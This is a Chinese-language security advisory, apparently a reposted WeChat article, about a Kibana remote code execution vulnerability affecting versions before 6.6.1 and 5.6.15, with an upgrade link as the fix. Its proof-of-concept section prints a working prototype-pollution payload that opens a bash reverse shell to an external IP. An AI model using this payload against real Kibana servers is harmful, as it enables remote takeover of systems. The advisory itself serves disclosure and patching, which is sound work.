【最新漏洞预警】Kibana远程代码执行漏洞

释放双眼,带上耳机,听听看~!

  Kibana < 6.6.0 代码执行漏洞  


一:漏洞描述

Kibana是一个开源的分析和可视化平台,常被用于和Elasticsearch一起工作。用Kibana来搜索、查看、并和存储在Elasticsearch索引中的数据进行交互。可以轻松地执行高级数据分析,并且以各种图标、表格和地图的形式可视化数据。做运维的大佬们对他应该特别熟悉。

昨天下午小编喝完美女同事送的奶茶后,精神异常抖擞。就在今天凌晨,小编监测到小于6.6.0版本的Kibana被曝出存在远程代码执行漏洞(remote code execution)。

该漏洞存在于Kibana节点的环境变量中,攻击者能够通过污染的节点环境变量来执行任意Javascript代码。从而直接接管服务器。危害较大!!!

二:漏洞等级

高危

三:漏洞攻击演示

POC:

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.0.136/12345 0>&1");process.exit()//').props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

漏洞利用:

触发漏洞后即可拿到服务器权限,执行任意命令。

该漏洞只影响小于6.6.1的版本。目前kibana最新版是7.4.0。小编扫了300多个公网可访问的kibana系统,发现没一个存在漏洞的。不知道公司内网使用低版本的多不多。请使用该系统的尽快排查一下是否受影响。

四:影响范围

Kibana < 5.6.15 

Kibana < 6.6.1

五:解决方案

可通过以下链接升级到Kibana版本6.6.1或5.6.15。

https://discuss.elastic.co/t/elastic-stack-6-6-1-and-5-6-15-security-update/169077

小编会实时跟进该漏洞的实时进展

关于漏洞更多详情、疑惑  随时留言!有问必答!


关注微信公众号

第一时间 实时 获取最新漏洞公告

本文源自微信公众号:黑客信徒

人已赞赏
安全工具

200万条12306数据再现暗网

2019-10-21 14:54:10

安全工具

安卓客户端动态调试环境搭建

2019-10-21 14:54:17

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索